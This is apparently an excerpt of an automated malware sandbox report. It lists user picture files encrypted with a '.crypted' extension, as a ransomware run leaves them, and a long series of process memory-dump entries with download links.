C:\Users\Admin\Pictures\CheckpointSkip.jpg.crypted

Download Submit
C:\Users\Admin\Pictures\ConvertFromEdit.tiff.crypted

Download Submit
C:\Users\Admin\Pictures\DebugRename.jpeg.crypted

Download Submit
C:\Users\Admin\Pictures\EnableReset.png.crypted

Download Submit
C:\Users\Admin\Pictures\EnableSave.jpeg.crypted

Download Submit
C:\Users\Admin\Pictures\ExitCheckpoint.svg.crypted

Download Submit
C:\Users\Admin\Pictures\ExitDeny.png.crypted

Download Submit
C:\Users\Admin\Pictures\GrantConvertFrom.gif.crypted

Download Submit
C:\Users\Admin\Pictures\ResumeSwitch.svg.crypted

Download Submit
C:\Users\Admin\Pictures\SyncRequest.svg.crypted

Download Submit
C:\Users\Admin\Pictures\UnblockRegister.svg.crypted

Download Submit
C:\Users\Admin\Pictures\UpdateCheckpoint.png.crypted

Download Submit
C:\Users\Admin\Pictures\WriteResolve.dwg.crypted

Download Submit
memory/212-88-0x0000000000000000-mapping.dmp

Download
memory/216-104-0x0000000000000000-mapping.dmp

Download
memory/232-118-0x0000000000000000-mapping.dmp

Download
memory/236-96-0x0000000000000000-mapping.dmp

Download
memory/240-4-0x0000000000000000-mapping.dmp

Download
memory/300-54-0x0000000000000000-mapping.dmp

Download
memory/324-41-0x0000000000000000-mapping.dmp

Download
memory/324-180-0x0000000000000000-mapping.dmp

Download
memory/324-137-0x0000000000000000-mapping.dmp

Download
memory/364-177-0x0000000000000000-mapping.dmp

Download
memory/368-52-0x0000000000000000-mapping.dmp

Download
memory/520-84-0x0000000000000000-mapping.dmp

Download
memory/544-69-0x0000000000000000-mapping.dmp

Download
memory/544-111-0x0000000000000000-mapping.dmp

Download
memory/544-1-0x0000000000000000-mapping.dmp

Download
memory/568-51-0x0000000000000000-mapping.dmp

Download
memory/608-95-0x0000000000000000-mapping.dmp

Download
memory/616-19-0x0000000000000000-mapping.dmp

Download
memory/632-114-0x0000000000000000-mapping.dmp

Download
memory/652-16-0x0000000000000000-mapping.dmp

Download
memory/744-82-0x0000000000000000-mapping.dmp

Download
memory/748-106-0x0000000000000000-mapping.dmp

Download
memory/780-81-0x0000000000000000-mapping.dmp

Download
memory/836-38-0x0000000000000000-mapping.dmp

Download
memory/848-40-0x0000000000000000-mapping.dmp

Download
memory/856-32-0x0000000000000000-mapping.dmp

Download
memory/864-17-0x0000000000000000-mapping.dmp

Download
memory/872-122-0x0000000000000000-mapping.dmp

Download
memory/872-98-0x0000000000000000-mapping.dmp

Download
memory/984-18-0x0000000000000000-mapping.dmp

Download
memory/1000-78-0x0000000000000000-mapping.dmp

Download
memory/1008-120-0x0000000000000000-mapping.dmp

Download
memory/1012-2-0x0000000000000000-mapping.dmp

Download
memory/1040-97-0x0000000000000000-mapping.dmp

Download
memory/1044-90-0x0000000000000000-mapping.dmp

Download
memory/1056-109-0x0000000000000000-mapping.dmp

Download
memory/1060-70-0x0000000000000000-mapping.dmp

Download
memory/1064-42-0x0000000000000000-mapping.dmp

Download
memory/1068-5-0x0000000000000000-mapping.dmp

Download
memory/1068-73-0x0000000000000000-mapping.dmp

Download
memory/1080-107-0x0000000000000000-mapping.dmp

Download
memory/1084-68-0x0000000000000000-mapping.dmp

Download
memory/1088-6-0x0000000000000000-mapping.dmp

Download
memory/1092-74-0x0000000000000000-mapping.dmp

Download
memory/1100-65-0x0000000000000000-mapping.dmp

Download
memory/1104-178-0x0000000000000000-mapping.dmp

Download
memory/1104-121-0x0000000000000000-mapping.dmp

Download
memory/1104-34-0x0000000000000000-mapping.dmp

Download
memory/1108-115-0x0000000000000000-mapping.dmp

Download
memory/1116-80-0x0000000000000000-mapping.dmp

Download
memory/1200-33-0x0000000000000000-mapping.dmp

Download
memory/1200-66-0x0000000000000000-mapping.dmp

Download
memory/1208-119-0x0000000000000000-mapping.dmp

Download
memory/1212-83-0x0000000000000000-mapping.dmp

Download
memory/1256-56-0x0000000000000000-mapping.dmp

Download
memory/1292-175-0x0000000000000000-mapping.dmp

Download
memory/1292-113-0x0000000000000000-mapping.dmp

Download
memory/1308-117-0x0000000000000000-mapping.dmp

Download
memory/1316-20-0x0000000000000000-mapping.dmp

Download
memory/1324-77-0x0000000000000000-mapping.dmp

Download
memory/1360-9-0x0000000000000000-mapping.dmp

Download
memory/1376-44-0x0000000000000000-mapping.dmp

Download
memory/1380-45-0x0000000000000000-mapping.dmp

Download
memory/1380-75-0x0000000000000000-mapping.dmp

Download
memory/1480-0-0x0000000000000000-mapping.dmp

Download
memory/1484-35-0x0000000000000000-mapping.dmp

Download
memory/1488-67-0x0000000000000000-mapping.dmp

Download
memory/1492-36-0x0000000000000000-mapping.dmp

Download
memory/1504-100-0x0000000000000000-mapping.dmp

Download
memory/1508-91-0x0000000000000000-mapping.dmp

Download
memory/1516-108-0x0000000000000000-mapping.dmp

Download
memory/1516-53-0x0000000000000000-mapping.dmp

Download
memory/1520-7-0x0000000000000000-mapping.dmp

Download
memory/1524-43-0x0000000000000000-mapping.dmp

Download
memory/1524-92-0x0000000000000000-mapping.dmp

Download
memory/1544-110-0x0000000000000000-mapping.dmp

Download
memory/1556-89-0x0000000000000000-mapping.dmp

Download
memory/1560-105-0x0000000000000000-mapping.dmp

Download
memory/1564-58-0x0000000000000000-mapping.dmp

Download
memory/1568-59-0x0000000000000000-mapping.dmp

Download
memory/1572-37-0x0000000000000000-mapping.dmp

Download
memory/1576-179-0x0000000000000000-mapping.dmp

Download
memory/1592-22-0x0000000000000000-mapping.dmp

Download
memory/1600-94-0x0000000000000000-mapping.dmp

Download
memory/1600-57-0x0000000000000000-mapping.dmp

Download
memory/1612-99-0x0000000000000000-mapping.dmp

Download
memory/1612-71-0x0000000000000000-mapping.dmp

Download
memory/1612-3-0x0000000000000000-mapping.dmp

Download
memory/1612-39-0x0000000000000000-mapping.dmp

Download
memory/1616-72-0x0000000000000000-mapping.dmp

Download
memory/1620-24-0x0000000000000000-mapping.dmp

Download
memory/1624-85-0x0000000000000000-mapping.dmp

Download
memory/1624-55-0x0000000000000000-mapping.dmp

Download
memory/1624-21-0x0000000000000000-mapping.dmp

Download
memory/1632-86-0x0000000000000000-mapping.dmp

Download
memory/1636-23-0x0000000000000000-mapping.dmp

Download
memory/1668-8-0x0000000000000000-mapping.dmp

Download
memory/1696-112-0x0000000000000000-mapping.dmp

Download
memory/1764-10-0x0000000000000000-mapping.dmp

Download
memory/1768-50-0x0000000000000000-mapping.dmp

Download
memory/1768-15-0x0000000000000000-mapping.dmp

Download
memory/1784-49-0x0000000000000000-mapping.dmp

Download
memory/1788-14-0x0000000000000000-mapping.dmp

Download
memory/1792-48-0x0000000000000000-mapping.dmp

Download
memory/1804-101-0x0000000000000000-mapping.dmp

Download
memory/1816-46-0x0000000000000000-mapping.dmp

Download
memory/1824-11-0x0000000000000000-mapping.dmp

Download
memory/1824-116-0x0000000000000000-mapping.dmp

Download
memory/1828-47-0x0000000000000000-mapping.dmp

Download
memory/1828-102-0x0000000000000000-mapping.dmp

Download
memory/1836-12-0x0000000000000000-mapping.dmp

Download
memory/1844-13-0x0000000000000000-mapping.dmp

Download
memory/1848-93-0x0000000000000000-mapping.dmp

Download
memory/1852-76-0x0000000000000000-mapping.dmp

Download
memory/1888-27-0x0000000000000000-mapping.dmp

Download
memory/1892-28-0x0000000000000000-mapping.dmp

Download
memory/1896-25-0x0000000000000000-mapping.dmp

Download
memory/1900-61-0x0000000000000000-mapping.dmp

Download
memory/1908-60-0x0000000000000000-mapping.dmp

Download
memory/1932-103-0x0000000000000000-mapping.dmp

Download
memory/1936-79-0x0000000000000000-mapping.dmp

Download
memory/1948-26-0x0000000000000000-mapping.dmp

Download
memory/1968-29-0x0000000000000000-mapping.dmp

Download
memory/1972-63-0x0000000000000000-mapping.dmp

Download
memory/1980-30-0x0000000000000000-mapping.dmp

Download
memory/1984-62-0x0000000000000000-mapping.dmp

Download
memory/2012-181-0x0000000000000000-mapping.dmp

Download
memory/2028-87-0x0000000000000000-mapping.dmp

Download
memory/2028-31-0x0000000000000000-mapping.dmp

Download
memory/2032-64-0x0000000000000000-mapping.dmp

Download